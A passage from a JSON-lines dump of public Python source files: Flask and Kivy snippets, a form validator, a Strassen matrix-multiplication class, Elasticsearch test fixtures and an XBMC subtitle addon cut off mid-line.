@blp.response(200, EnergySchema(many=True))\n def get(self):\n \"\"\"List energies\"\"\"\n return Energy.get()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/energies/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9970962513","text":"def make_error(code, text):\n return {\n \"code\": code,\n \"text\": text\n }\n\n\ndef get_errors(data, fields):\n errors = []\n\n for field in fields:\n code = field['code']\n title = field['title']\n\n # required\n if field['is_required'] and code not in data:\n errors.append(make_error(code, f\"Заполните поле {title}\"))\n continue\n\n if not field['is_required'] and code not in data:\n continue\n\n # datatype\n if field[\"type\"] == \"int\":\n try:\n data[code] = int(data[code])\n except:\n errors.append(make_error(code, f\"Значение {title} должно быть целым числом\"))\n continue\n\n elif field[\"type\"] == \"float\":\n try:\n data[code] = float(data[code])\n except:\n errors.append(make_error(code, f\"Значение {title} должно быть числом\"))\n continue\n\n elif field[\"type\"] == \"radio\" or field[\"type\"] == \"select\":\n print(field)\n options = list(map(lambda variant: variant['value'], field['options']))\n\n if data[code] not in options:\n errors.append(make_error(code, f\"Недопустимое значение {title}\"))\n continue\n\n value = data[code]\n\n # limits\n if \"limits\" in field:\n for rule in field[\"limits\"]:\n if rule[\"type\"] == \"max\":\n if value > rule['value']:\n errors.append(make_error(code, f\"Значение {title} должно быть меньше {rule['value']}\"))\n continue\n if rule[\"type\"] == \"min\":\n if value < rule['value']:\n errors.append(make_error(code, f\"Значение {title} должно быть больше {rule['value']}\"))\n continue\n\n return errors\n","repo_name":"roctbb/mcalc","sub_path":"backend/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39115490444","text":"import difflib as df\nimport json as j\n\ndata = j.load(open(\"data.json\"))\n\n\ndef translate(word):\n if word.lower() in data:\n return data[word]\n elif len(df.get_close_matches(word, data.keys(), n=5, cutoff=0.7)):\n x = df.get_close_matches(word, data.keys(), n=5, cutoff=0.7)\n y = \"\"\n for i in x:\n y = y + \" -- \" + i + \" -- \"\n choice = input(\n \"Do you mean to find the meaning if the follwing words\" + y + \"Then type Yes or No\\nYes\\\\No --> \")\n if choice.lower() == \"yes\":\n newWord = input(\"Enter the word again --> \")\n return translate(newWord)\n elif choice.lower() == \"no\":\n newWords = input(\"Reenter the word --> \")\n return translate(newWords)\n else:\n return \"We can't understand \"\n\n else:\n return \"\\\"\" + word + \"\\\" Has no meaning in the dictionary\"\n\n\nword = input(\"Enter the word to find its meaning --> \")\noutput = translate(word)\nif type(output) == list:\n print(\"Meaning of the word is \" + \" ==>\")\n for i in output:\n print(\" \" * len(\"Meaning of the word is \") + \"-->\" + i + \"\\n\")\nelse:\n print(output)\n","repo_name":"abhishekgupta0912/Interactive_English_Dictionary","sub_path":"Data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23627333937","text":"# -*- coding: utf8 -*-\n__author__ = '54'\nimport time\nfrom PyQt4.QtCore import *\nclass Monitor(QThread):\n def __init__(self,Vcenter,parent=None):\n QThread.__init__(self, parent)#添加QThread初始化方法\n self.Vcenter=Vcenter\n self.connect(self,SIGNAL('vmrefresh(QString,QString)'),self.Vcenter.widgetvmReflash)\n self.connect(self,SIGNAL('hostrefresh(QString,QString)'),self.Vcenter.widgethostReflash)\n self.flag=False\n self.host=None\n self.vm=None\n\n def stop(self):\n self.flag=False\n self.host=None\n self.vm=None\n\n def run(self):\n self.flag=True\n while self.flag:\n if self.vm is not None and self.vm.PowerState == '5' and self.host.isOnline:\n self.host.socket_processor.vb.get_guest_performance(self.vm.Name)\n time.sleep(1)\n self.emit(SIGNAL('vmrefresh(QString,QString)'),self.host.Name,self.vm.Name)\n elif self.host.isOnline:\n self.host.socket_processor.vb.get_host_cpu_usage()\n self.host.socket_processor.vb.get_host_mem_avail()\n self.host.socket_processor.vb.get_host_storageinfo()\n time.sleep(1)\n self.emit(SIGNAL('hostrefresh(QString,QString)'),self.host.Name,self.host.Name)","repo_name":"pvt54/VboxCenter","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4156040519","text":"from kivy.app import App\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.floatlayout import FloatLayout\r\n\r\n\"\"\"\r\nThis is a demonstration of how widgets are displayed in\r\nthe 'FloatLayout' in Kivy\r\nThis first example will be super simple.\r\n\"\"\"\r\n\r\n\r\nclass RootWidget(FloatLayout):\r\n\r\n def __init__(self, **kwargs):\r\n super(RootWidget, self).__init__(**kwargs)\r\n \"\"\"\r\n self.add_widget(Button(size=(500, 200),\r\n pos=(0, 0),\r\n text='btn 1'))\r\n self.add_widget(Button(size=(300, 500),\r\n pos=(200, 20),\r\n text='btn 2'))\r\n self.add_widget(Button(size_hint=(.5, .20),\r\n pos=(20, 200),\r\n text='btn 3'))\r\n self.add_widget(Button(size_hint=(.5, .20),\r\n pos=(200, 200),\r\n text='btn 4'))\r\n \"\"\"\r\n self.add_widget(Button(size_hint=(.5, .20), #size is 50% of the window width and 20% of the window height\r\n pos_hint={'x': .0, 'y': .0}, #position is displaced by 0% x and 0%y\r\n text='btn 1'))\r\n self.add_widget(Button(size_hint=(.3, .5), #size is 30% of the window width and 50% of the window height\r\n pos_hint={'x': .2, 'y': .45}, #position is displaced by 20% x and 45%y\r\n text='btn 2'))\r\n self.add_widget(Button(size_hint=(.5, .20), #size is 50% of the window width and 20% of the window height\r\n pos_hint={'x': .5, 'y': .0}, #position is halfway up the window, and touching the left side\r\n text='btn 3'))\r\n self.add_widget(Button(size_hint=(.2, .20),\r\n pos_hint={'x': .2, 'y': .2}, #a fifth of the way up the window, a fifth right of the window\r\n text='btn 4'))\r\n #\"\"\"\r\nclass TestApp(App):\r\n\r\n def build(self):\r\n return RootWidget()\r\n\r\n\r\nif __name__ == '__main__':\r\n TestApp().run()","repo_name":"hwynn/Kivy-Examples","sub_path":"Style/exLayoutFloatPyStaticVsStretch.py","file_name":"exLayoutFloatPyStaticVsStretch.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35508388682","text":"\n\nclass Matrix:\n\n def importData(self, data, rows=-1, columns=-1):\n self.data = data\n if rows == -1:\n self.rows = len(data)\n else:\n self.rows = rows\n if columns == -1:\n if self.rows > 0:\n self.columns = len(data[0])\n else:\n self.columns = 0\n else:\n self.columns = columns\n return self\n \n def makeMatrix(self, rows, columns):\n self.rows = rows\n self.columns = columns\n self.data=[]\n for _ in range(self.rows):\n col = []\n for _ in range(self.columns):\n col.append(0)\n self.data.append(col)\n return self\n\n def makeSubMatrix(self, rows, columns, reference, startRow, startCol):\n self.rows = rows\n self.columns = columns\n self.data=[]\n for i in range(self.rows):\n col = []\n for j in range(self.columns):\n col.append(reference[startRow + i][startCol + j])\n self.data.append(col)\n return self\n \n def __len__(self):\n return self.rows\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __add__(self, other):\n if not self.rows == other.rows or not self.columns == other.columns:\n raise Exception(\"Incompatible matrices, addition failed\")\n\n result = Matrix().makeMatrix(self.rows, self.columns)\n for i in range(self.rows):\n for j in range(self.columns):\n result[i][j] = self[i][j] + other[i][j]\n return result\n\n def __sub__(self, other):\n if not self.rows == other.rows or not self.columns == other.columns:\n raise Exception(\"Incompatible matrices, subtraction failed\")\n\n result = Matrix().makeMatrix(self.rows, self.columns)\n for i in range(self.rows):\n for j in range(self.columns):\n result[i][j] = self[i][j] - other[i][j]\n return result\n\n # Basic matrix multiplication\n def BMM(self, other):\n if not self.columns == other.rows:\n raise Exception(\"Incompatible matrices, BMM failed\")\n\n result = Matrix().makeMatrix(self.rows, other.columns)\n\n for i in range(0, result.rows):\n for j in range(0, result.columns):\n sum = 0\n for k in range(0, self.columns):\n a = self[i][k]\n b = other[k][j]\n sum = sum + a * b\n result[i][j] = sum\n return result\n\n def SAM(self, other):\n if self.rows != self.columns or other.rows != other.columns:\n raise Exception(\"Matrices must be square; SAM failed\")\n if self.columns != other.rows:\n raise Exception(\"Incompatible matrices, SAM failed\")\n \n if (self.rows == 1):\n result = Matrix().importData([[\n self[0][0] * other[0][0]\n ]])\n return result\n\n # Check that matrix is a power of 2\n if (not (self.rows & (self.rows-1) == 0) and self.rows != 0):\n m = Matrix.__findNextPowerOf2(self.rows)\n # Deep copy of self and other (as to not modify their data)\n a = Matrix().importData([row[:] for row in self.data])\n a.expandMatrix(m, m)\n b = Matrix().importData([row[:] for row in other.data])\n b.expandMatrix(m, m)\n else:\n a = self\n b = other\n\n # Result matrix\n result = Matrix().makeMatrix(a.rows, a.columns)\n # Dimensions of sub-matrices\n k = a.rows // 2\n # Define and initialize sub-matrices (may be slow)\n ma11 = Matrix().makeSubMatrix(k, k, a, 0, 0)\n ma12 = Matrix().makeSubMatrix(k, k, a, 0, k)\n ma21 = Matrix().makeSubMatrix(k, k, a, k, 0)\n ma22 = Matrix().makeSubMatrix(k, k, a, k, k)\n mb11 = Matrix().makeSubMatrix(k, k, b, 0, 0)\n mb12 = Matrix().makeSubMatrix(k, k, b, 0, k)\n mb21 = Matrix().makeSubMatrix(k, k, b, k, 0)\n mb22 = Matrix().makeSubMatrix(k, k, b, k, k)\n # Define + initialize has a runtime of 8(k^2)\n # \t- Optimized to 7(k^2), but still a nasty amount of overhead\n # If this was programmed in c, we could simply move the pointers\n # \tfor this to run in constant time\n\n p1 = ma11.SAM(mb12 - mb22)\n p2 = (ma11 + ma12).SAM(mb22)\n p3 = (ma21 + ma22).SAM(mb11)\n p4 = ma22.SAM(mb21 - mb11)\n p5 = (ma11 + ma22).SAM(mb11 + mb22)\n p6 = (ma12 - ma22).SAM(mb21 + mb22)\n p7 = (ma11 - ma21).SAM(mb11 + mb12)\n\n mr11 = (p5 + p4 + p6) - p2\n mr12 = p1 + p2\n mr21 = p3 + p4\n mr22 = (p5 + p1) - p3 - p7\n\n for i in range(k):\n for j in range(k):\n result[i][j] = mr11[i][j]\n result[i][j+k] = mr12[i][j]\n result[k+i][j] = mr21[i][j]\n result[k+i][k+j] = mr22[i][j]\n # Trim result back down to correct size\n result.rows = self.rows\n result.columns = self.columns\n result.data = [result[i][:result.columns] for i in range(result.rows)]\n\n return result\n\n def SAMk(self, other, cutoff=8):\n if self.rows != self.columns or other.rows != other.columns:\n raise Exception(\"Matrices must be square; SAMk failed\")\n if self.columns != other.rows:\n raise Exception(\"Incompatible matrices, SAMk failed\")\n\n if self.rows <= cutoff:\n return self.BMM(other)\n \n if (self.rows == 1):\n result = Matrix().importData([[\n self[0][0] * other[0][0]\n ]])\n return result\n\n # Check that matrix is a power of 2\n if (not (self.rows & (self.rows-1) == 0) and self.rows != 0):\n m = Matrix.__findNextPowerOf2(self.rows)\n # Deep copy of self and other (as to not modify their data)\n a = Matrix().importData([row[:] for row in self.data])\n a.expandMatrix(m, m)\n b = Matrix().importData([row[:] for row in other.data])\n b.expandMatrix(m, m)\n else:\n a = self\n b = other\n\n # Result matrix\n result = Matrix().makeMatrix(a.rows, a.columns)\n # Dimensions of sub-matrices\n k = a.rows // 2\n # Define and initialize sub-matrices (may be slow)\n ma11 = Matrix().makeSubMatrix(k, k, a, 0, 0)\n ma12 = Matrix().makeSubMatrix(k, k, a, 0, k)\n ma21 = Matrix().makeSubMatrix(k, k, a, k, 0)\n ma22 = Matrix().makeSubMatrix(k, k, a, k, k)\n mb11 = Matrix().makeSubMatrix(k, k, b, 0, 0)\n mb12 = Matrix().makeSubMatrix(k, k, b, 0, k)\n mb21 = Matrix().makeSubMatrix(k, k, b, k, 0)\n mb22 = Matrix().makeSubMatrix(k, k, b, k, k)\n # Define + initialize has a runtime of 8(k^2)\n # \t- Optimized to 7(k^2), but still a nasty amount of overhead\n # If this was programmed in c, we could simply move the pointers\n # \tfor this to run in constant time\n\n p1 = ma11.SAMk(mb12 - mb22, cutoff)\n p2 = (ma11 + ma12).SAMk(mb22, cutoff)\n p3 = (ma21 + ma22).SAMk(mb11, cutoff)\n p4 = ma22.SAMk(mb21 - mb11, cutoff)\n p5 = (ma11 + ma22).SAMk(mb11 + mb22, cutoff)\n p6 = (ma12 - ma22).SAMk(mb21 + mb22, cutoff)\n p7 = (ma11 - ma21).SAMk(mb11 + mb12, cutoff)\n\n mr11 = (p5 + p4 + p6) - p2\n mr12 = p1 + p2\n mr21 = p3 + p4\n mr22 = (p5 + p1) - p3 - p7\n\n for i in range(k):\n for j in range(k):\n result[i][j] = mr11[i][j]\n result[i][j+k] = mr12[i][j]\n result[k+i][j] = mr21[i][j]\n result[k+i][k+j] = mr22[i][j]\n # Trim result back down to correct size\n result.rows = self.rows\n result.columns = self.columns\n result.data = [result[i][:result.columns] for i in range(result.rows)]\n\n return result\n\n\n def expandMatrix(self, rows, columns, *, fill = lambda i, j: 0):\n # Expand current columns to be taller\n for i in range(self.rows):\n for j in range(self.columns, columns):\n self[i].append(fill(i, j))\n\n # Add extra columns\n for i in range(self.rows, rows):\n column = []\n for j in range(columns):\n column.append(fill(i, j))\n self.data.append(column)\n self.rows = rows\n self.columns = columns\n return self\n\n @staticmethod\n def __findNextPowerOf2(n):\n #Bit manipulation stuff to find next power of 2 from n \n n = n - 1\n\n n |= n >> 1\n n |= n >> 2\n n |= n >> 4\n n |= n >> 8\n n |= n >> 16\n\n return n + 1\n\n # Functions for pretty printing\n # -----------------------------\n\n # Gets witdh of the largest element in the matrix\n def getColumnWidth(self):\n width = 0\n for i in range(0, self.rows):\n for j in range(0, self.columns):\n if len(str(self.data[i][j])) > width:\n width = len(str(self.data[i][j]))\n return width\n\n # Gets total width of the matrix\n def getMatrixWidth(self):\n width = 2 \t\t\t# | and |\n width = width + 1 \t# padding before second |\n width = width + (self.getColumnWidth() + 1) * self.columns\n return width\n\n # Converts matrix data to pretty-array format for printing\n def toArray(self):\n width = self.getColumnWidth()\n body = []\n\n for i in range(self.rows):\n if self.rows == 1:\n symbols = (\"│\", \"│\")\n elif i == 0:\n symbols = (\"┌\", \"┐\")\n elif i == self.rows - 1:\n symbols = (\"└\", \"┘\")\n else:\n symbols = (\"│\", \"│\")\n\n line = symbols[0]\n for j in range(self.columns):\n line = line + f\" {self.data[i][j]:<{width}}\"\n line = line + \" \" + symbols[1]\n body.append(line)\n\n return body\n\n def __str__(self):\n body = self.toArray()\n text = \"\\n\"\n text = text.join(body)\n return text\n\n \"\"\"\n Pads the top + bottom of an array so that it displays nicely\n \"\"\"\n @staticmethod\n def padMatrixArray(matrix, width, targetHeight):\n if(len(matrix) < targetHeight):\n delta = int((targetHeight - len(matrix))/2)\n # Prepend blanks to top of array\n for _ in range(0, delta):\n matrix.insert(0, \" \" * width)\n # Append blanks to bottom of array\n for _ in range(len(matrix), targetHeight):\n matrix.append(\" \" * width)\n\n return matrix\n\n \"\"\"\n Prints the 3 provided matrices in the form\n matrix1 * matrix2 = resultMatrix\n ~does not perform multiplacation~\n \"\"\"\n @staticmethod\n def printEquation(matrix1, matrix2, resultMatrix, *, symbol=\"*\"):\n\n m1 = matrix1.toArray()\n m2 = matrix2.toArray()\n result = resultMatrix.toArray()\n\n height = max(matrix1.rows, matrix2.rows, resultMatrix.rows)\n\n # Pad matrices to line up nicely\n m1 = Matrix.padMatrixArray(m1, matrix1.getMatrixWidth(), height)\n m2 = Matrix.padMatrixArray(m2, matrix2.getMatrixWidth(), height)\n result = Matrix.padMatrixArray(result, resultMatrix.getMatrixWidth(), height)\n\n mid = int((height-1) // 2)\n for i in range(0, mid):\n print(f\"{m1[i]} {m2[i]} {result[i]}\")\n\n print(f\"{m1[mid]} {symbol} {m2[mid]} = {result[mid]}\")\n\n for i in range(mid + 1, height):\n print(f\"{m1[i]} {m2[i]} {result[i]}\")\n\n\n\n","repo_name":"PvtPuddles/441TermProject","sub_path":"Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18296211172","text":"import time\nfrom pathlib import Path\nfrom typing import Callable\n\nimport pytest\nfrom indigo import Indigo # type: ignore\n\nfrom bingo_elastic.elastic import (\n AsyncElasticRepository,\n ElasticRepository,\n IndexName,\n)\nfrom bingo_elastic.model.helpers import iterate_file, load_reaction\nfrom bingo_elastic.model.record import IndigoRecordMolecule\n\n\n@pytest.fixture()\ndef resource_loader() -> Callable[[str], str]:\n cwd = Path.cwd()\n\n def wrapper(resource: str):\n if cwd.name == \"tests\":\n return str(Path(\"resources\") / resource)\n if cwd.name == \"model\":\n return str(cwd.parent / \"resources\" / resource)\n return str(cwd / \"tests\" / \"resources\" / resource)\n\n return wrapper\n\n\n@pytest.fixture\ndef indigo_fixture() -> Indigo:\n return Indigo()\n\n\n@pytest.fixture\ndef elastic_repository_molecule() -> ElasticRepository:\n x = ElasticRepository(\n IndexName.BINGO_MOLECULE, host=\"127.0.0.1\", port=9200\n )\n return x\n\n\n@pytest.fixture\ndef elastic_repository_reaction() -> ElasticRepository:\n return ElasticRepository(\n IndexName.BINGO_REACTION, host=\"127.0.0.1\", port=9200\n )\n\n\n@pytest.fixture\ndef a_elastic_repository_molecule() -> Callable[[], AsyncElasticRepository]:\n def wraped():\n return AsyncElasticRepository(\n IndexName.BINGO_MOLECULE, host=\"127.0.0.1\", port=9200\n )\n\n return wraped\n\n\n@pytest.fixture\ndef a_elastic_repository_reaction() -> Callable[[], AsyncElasticRepository]:\n def wraped():\n return AsyncElasticRepository(\n IndexName.BINGO_REACTION, host=\"127.0.0.1\", port=9200\n )\n\n return wraped\n\n\n@pytest.fixture(autouse=True)\ndef clear_index(\n elastic_repository_molecule: ElasticRepository,\n elastic_repository_reaction: ElasticRepository,\n):\n elastic_repository_molecule.delete_all_records()\n elastic_repository_reaction.delete_all_records()\n\n\n@pytest.fixture\ndef loaded_sdf(\n elastic_repository_molecule: ElasticRepository, resource_loader\n) -> IndigoRecordMolecule:\n resource = resource_loader(\"molecules/rand_queries_small.sdf\")\n sdf = iterate_file(Path(resource))\n elastic_repository_molecule.index_records(sdf, chunk_size=10)\n time.sleep(5)\n return next(\n iterate_file(Path(resource_loader(\"molecules/rand_queries_small.sdf\")))\n )\n\n\n@pytest.fixture\ndef loaded_rxns(\n elastic_repository_reaction: ElasticRepository,\n resource_loader: Callable[[str], str],\n indigo_fixture,\n):\n for file_ in Path(resource_loader(\"reactions/rheadb\")).iterdir():\n if file_.suffix == \".rxn\":\n reaction_file = load_reaction(file_, indigo_fixture)\n elastic_repository_reaction.index_record(reaction_file)\n\n time.sleep(5)\n","repo_name":"epam/Indigo","sub_path":"bingo/bingo-elastic/python/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"13032214687","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 数据\nY = np.random.normal(loc=0.0, scale=1.0, size=10000)\nX = np.random.random(size=10000)\n\n# 例子 1:\nplt.figure()\n_ = plt.hist2d(X, Y, bins=25)\nplt.show()\n\n# 例子 2:\nplt.figure()\n_ = plt.hist2d(X, Y, bins=100)\n# add a colorbar legend\nplt.colorbar()\nplt.show()\n","repo_name":"shijiansu/coursera-applied-data-science-with-python","sub_path":"2_applied_data_representation/w3_charting_fundamentals/1_chart/4_heatmap.py","file_name":"4_heatmap.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455053548","text":"n = int(input())\ncnt = 0\nwords =[]\nfor i in range(n):\n words.append(sorted(list(input())))\nwhile words:\n target = words[0]\n if target in words:\n words = [word for word in words if word != target]\n cnt +=1\n else:\n words.remove(target)\n cnt+=1\n\nprint(cnt)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/61-동일한_단어_그룹화하기.py","file_name":"61-동일한_단어_그룹화하기.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18569821785","text":"# Nama file : max3v1.py\n# Pembuat : Ahmad Alexander\n# Tanggal : 9 September 2019\n# Deskripsi : menentukan nilai maksimum dari 3 bilangan integer\n\n# Definisi dan spesifikasi dari fungsi max3 bernama max(a,b,c) adalah:\n# max3 : 3 integer --> integer\n# max3(a,b,c) menentukan nilai maksimum dari 3 bilangan integer yang berlainan a, b, dan c, menggunakan ekspresi kondisional versi 1\n\n# Realisasi\ndef max3(a, b, c):\n if (a > b) and (a > c):\n return a\n elif (b > a) and (b > c):\n return b\n elif (c > a) and (c > b):\n return c\n\n\n# Aplikasi\nprint(max3(12, 7, 5))\nprint(max3(4, 9, -10))\nprint(max3(100, -20, 300))\n\n","repo_name":"ahmadalexanderr/dasar-pemrograman","sub_path":"praktikum/praktikum_pre-uts/3/max3v1.py","file_name":"max3v1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32893151810","text":"section_list = [{\n \"label\": \"A Different Label\",\n \"other_data\": \"Other Data\",\n},\n{\n \"label\": \"Reel Reassignment\",\n \"more_data\": \"More Data\",\n}]\n\n# Filter through the list to find the object with the specified attribute in get (\"label\")\nreassign_section = next(filter(lambda s: s.get(\"label\") == \"Reel Reassignment\", section_list))\n\nprint(reassign_section)\n","repo_name":"revainisdead/christian-revain-hall","sub_path":"temp_code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27186542810","text":"import heapq\nN = int(input())\nx = list(map(int,input().split(\" \")))\nc = list(map(int,input().split(\" \")))\nv = list(map(int,input().split(\" \")))\n\ncv = [(C,V) for C,V in zip(c,v)]\n\ncv.sort(key=lambda x: x[1])\n\nmoney = 0\nans = 0\nsave = 0\nfor i in range(N):\n\tprint(cv)\n\tmoney += x[i]\n\ttmp_money = money\n\ttmp = 0\n\tsave += 1 \n\tfor cost,val in cv[::-1]:\n\t\tif cost <= tmp_money:\n\t\t\tif 0 < save:\n\t\t\t\tcv.remove((cost,val))\n\t\t\t\tsave -= 1\n\t\t\telse:\n\t\t\t\ttmp_money -= cost\n\t\t\t\ttmp += val\n\n\tans = max(ans,tmp)\n\tprint(ans)\n\nprint(ans)\n\n\n\n\n\n\n","repo_name":"banboooo044/AtCoder","sub_path":"procon/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18579234095","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport xbmc\nimport urllib\nimport socket\nimport xbmcgui\n\nfrom utilities import *\n\n_ = sys.modules[ \"__main__\" ].__language__\n__scriptname__ = sys.modules[ \"__main__\" ].__scriptname__\n__addon__ = sys.modules[ \"__main__\" ].__addon__\n__profile__ = sys.modules[ \"__main__\" ].__profile__\n__version__ = sys.modules[ \"__main__\" ].__version__\n\nclass GUI( xbmcgui.WindowXMLDialog ):\n\n def __init__( self, *args, **kwargs ):\n pass\n\n def onInit( self ):\n self.on_run()\n\n def on_run( self ):\n if not xbmc.getCondVisibility(\"VideoPlayer.HasSubtitles\"):\n self.getControl( 111 ).setVisible( False )\n self.list_services()\n try:\n self.Search_Subtitles()\n except:\n errno, errstr = sys.exc_info()[:2]\n xbmc.sleep(2000)\n self.close()\n\n def set_allparam(self):\n self.list = []\n service_list = []\n self.stackPath = []\n service = \"\"\n self.man_search_str = \"\"\n self.temp = False\n self.rar = False\n self.stack = False\n self.autoDownload = False\n self.focused = False\n use_subs_folder = __addon__.getSetting( \"use_subs_folder\" ) == \"true\" # use 'Subs' subfolder for storing subtitles\n movieFullPath = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8'))# Full path of a playing file\n useMovieFolderForSubs= __addon__.getSetting( \"subfolder\" ) == \"true\" # True for movie folder\n self.sub_folder = xbmc.translatePath(__addon__.getSetting( \"subfolderpath\" )).decode(\"utf-8\") # User specified subtitle folder\n self.year = xbmc.getInfoLabel(\"VideoPlayer.Year\") # Year\n self.season = str(xbmc.getInfoLabel(\"VideoPlayer.Season\")) # Season\n self.episode = str(xbmc.getInfoLabel(\"VideoPlayer.Episode\")) # Episode\n self.mansearch = __addon__.getSetting( \"searchstr\" ) == \"true\" # Manual search string??\n self.parsearch = __addon__.getSetting( \"par_folder\" ) == \"true\" # Parent folder as search string\n self.language_1 = languageTranslate(__addon__.getSetting( \"Lang01\" ), 4, 0) # Full language 1\n self.language_2 = languageTranslate(__addon__.getSetting( \"Lang02\" ), 4, 0) # Full language 2\n self.language_3 = languageTranslate(__addon__.getSetting( \"Lang03\" ), 4, 0) # Full language 3\n self.tmp_sub_dir = os.path.join( __profile__ ,\"sub_tmp\" ) # Temporary subtitle extraction directory\n self.stream_sub_dir = os.path.join( __profile__ ,\"sub_stream\" ) # Stream subtitle directory\n\n self.clean_temp() # clean temp dirs\n\n if ( movieFullPath.find(\"http\") > -1 ):\n self.sub_folder = self.stream_sub_dir\n self.temp = True\n\n elif ( movieFullPath.find(\"rar://\") > -1 ):\n self.rar = True\n movieFullPath = os.path.dirname(movieFullPath[6:])\n\n elif ( movieFullPath.find(\"stack://\") > -1 ):\n self.stackPath = movieFullPath.split(\" , \")\n movieFullPath = self.stackPath[0][8:]\n self.stack = True\n\n if useMovieFolderForSubs and not self.temp:\n if use_subs_folder:\n self.sub_folder = os.path.join(os.path.dirname( movieFullPath ),'Subs')\n xbmcvfs.mkdirs(self.sub_folder)\n else:\n self.sub_folder = os.path.dirname( movieFullPath )\n\n if not xbmcvfs.exists(self.sub_folder):\n xbmcvfs.mkdir(self.sub_folder)\n\n if self.episode.lower().find(\"s\") > -1: # Check if season is \"Special\"\n self.season = \"0\" #\n self.episode = self.episode[-1:] #\n\n self.tvshow = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.TVshowtitle\")) # Show\n self.title = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.OriginalTitle\"))# try to get original title\n if self.title == \"\":\n log( __name__, \"VideoPlayer.OriginalTitle not found\")\n self.title = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.Title\")) # no original title, get just Title :)\n\n if self.tvshow == \"\":\n if str(self.year) == \"\": # If we have a year, assume no tv show\n self.title, self.year = xbmc.getCleanMovieTitle( self.title ) # Clean before trying tvshow regex, else we get false results on some movies\n if str(self.year) == \"\": # Still no year: *could* be a tvshow\n title, season, episode = regex_tvshow(False, self.title)\n if title != \"\" and season != \"\" and episode != \"\":\n self.season = str(int(season))\n self.episode = str(int(episode))\n self.tvshow = title\n else:\n self.season = \"\" # Reset variables: could contain garbage from tvshow regex above\n self.episode = \"\"\n self.tvshow = \"\"\n else:\n self.year = \"\"\n\n self.file_original_path = urllib.unquote ( movieFullPath ) # Movie Path\n\n if (__addon__.getSetting( \"fil_name\" ) == \"true\"): # Display Movie name or search string\n self.file_name = os.path.basename( movieFullPath )\n else:\n if (len(str(self.year)) < 1 ) :\n self.file_name = self.title.encode('utf-8')\n if (len(self.tvshow) > 0):\n self.file_name = \"%s S%.2dE%.2d\" % (self.tvshow.encode('utf-8'),\n int(self.season),\n int(self.episode)\n )\n else:\n self.file_name = \"%s (%s)\" % (self.title.encode('utf-8'), str(self.year))\n\n if ((__addon__.getSetting( \"auto_download\" ) == \"true\") and\n (__addon__.getSetting( \"auto_download_file\" ) != os.path.basename( movieFullPath ))):\n self.autoDownload = True\n __addon__.setSetting(\"auto_download_file\", \"\")\n xbmc.executebuiltin((u\"Notification(%s,%s,10000)\" % (__scriptname__, _(763))).encode(\"utf-8\"))\n\n for name in os.listdir(SERVICE_DIR):\n if os.path.isdir(os.path.join(SERVICE_DIR,name)) and __addon__.getSetting( name ) == \"true\":\n service_list.append( name )\n service = name\n\n if len(self.tvshow) > 0:\n def_service = __addon__.getSetting( \"deftvservice\")\n else:\n def_service = __addon__.getSetting( \"defmovieservice\")\n\n if service_list.count(def_service) > 0:\n service = def_service\n\n if len(service_list) > 0:\n if len(service) < 1:\n self.service = service_list[0]\n else:\n self.service = service\n\n self.service_list = service_list\n self.next = list(service_list)\n\n log( __name__ ,\"Addon Version: [%s]\" % __version__)\n log( __name__ ,\"Manual Search : [%s]\" % self.mansearch)\n log( __name__ ,\"Default Service : [%s]\" % self.service)\n log( __name__ ,\"Services : [%s]\" % self.service_list)\n log( __name__ ,\"Temp?: [%s]\" % self.temp)\n log( __name__ ,\"Rar?: [%s]\" % self.rar)\n log( __name__ ,\"File Path: [%s]\" % self.file_original_path)\n log( __name__ ,\"Year: [%s]\" % str(self.year))\n log( __name__ ,\"Tv Show Title: [%s]\" % self.tvshow)\n log( __name__ ,\"Tv Show Season: [%s]\" % self.season)\n log( __name__ ,\"Tv Show Episode: [%s]\" % self.episode)\n log( __name__ ,\"Movie/Episode Title: [%s]\" % self.title)\n log( __name__ ,\"Subtitle Folder: [%s]\" % self.sub_folder)\n log( __name__ ,\"Languages: [%s] [%s] [%s]\" % (self.language_1, self.language_2, self.language_3))\n log( __name__ ,\"Parent Folder 